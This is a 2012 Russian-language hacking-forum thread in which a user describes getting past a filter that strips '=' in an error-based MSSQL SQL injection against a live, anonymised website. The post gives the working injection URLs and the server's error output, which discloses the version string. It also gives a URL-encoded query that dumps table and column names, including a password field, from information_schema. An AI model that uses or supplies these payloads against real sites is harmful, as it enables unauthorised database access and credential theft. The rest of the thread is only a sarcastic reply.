HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу маленько дополнение по mssql
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.01.2012, 20:14
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию
сегодня ковырял один сайт и наткнулся на интересную фильтрацию в mssql

Код:
Code:
http://www.xxx.com/index.asp?id=11'+or+1=@@version--
выдает -

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near '@@version'.

при таком:

Код:
Code:
http://www.xxx.com/index.asp?id=11+or+1=@@version--
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the varchar value '11 or 1@@version--' to data type int.

видим, что вырезается знак =

обходится это просто добавлением знака >

Код:
Code:
http://www.xxx.com/index.asp?id=11+or+1>@@version--
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the varchar value '11 or 1>@@version--' to data type int.

видит что не может с конвертировать данные, добавляем кавычку чтоб вызвать ошибку

Код:
Code:
http://www.xxx.com/index.asp?id=11'+or+1>@@version--
Microsoft OLE DB Provider for SQL Server error '80040e07'

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2050.00 (Intel X86) Feb 13 2007 23:02:48 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) ' to data type int.

и то что доктор прописал

Но тут возникает проблема со стандартным вытягиванием имен таблиц и полей, так как знак = фильтруется

подумав немного а составил следующий запрос для дампера:

Код:
Code:
http://www.xxx.com/index.asp?id=11'+or+1%3E%28select+top+1+cast%28table_name+as+nvarchar%29%2B%27:%27%2Bcast%28column_name+as+nvarchar%29+from+information_schema.columns+where+cast%28table_name+as+nvarchar%29%2B%27:%27%2Bcast%28column_name+as+nvarchar%29+not+in+%28select+top+5+cast%28table_name+as+nvarchar%29%2B%27:%27%2Bcast%28column_name+as+nvarchar%29+from+information_schema.columns%29%29--
который объединил вывод таблиц и полей:

livesupportfirm:ID

livesupportfirm:idfirma

livesupportfirm:name

livesupportfirm:username

livesupportfirmassword

livesupportfirm:status

livesupportfirm:email

livesupport:ID

З.Ы. америку тут я не открыл, но может кому инфа пригодится

durito
 
Ответить с цитированием

  #2  
Старый 16.01.2012, 14:29
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию
Слушай, может книгу напишешь?

И автограф бы еще.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ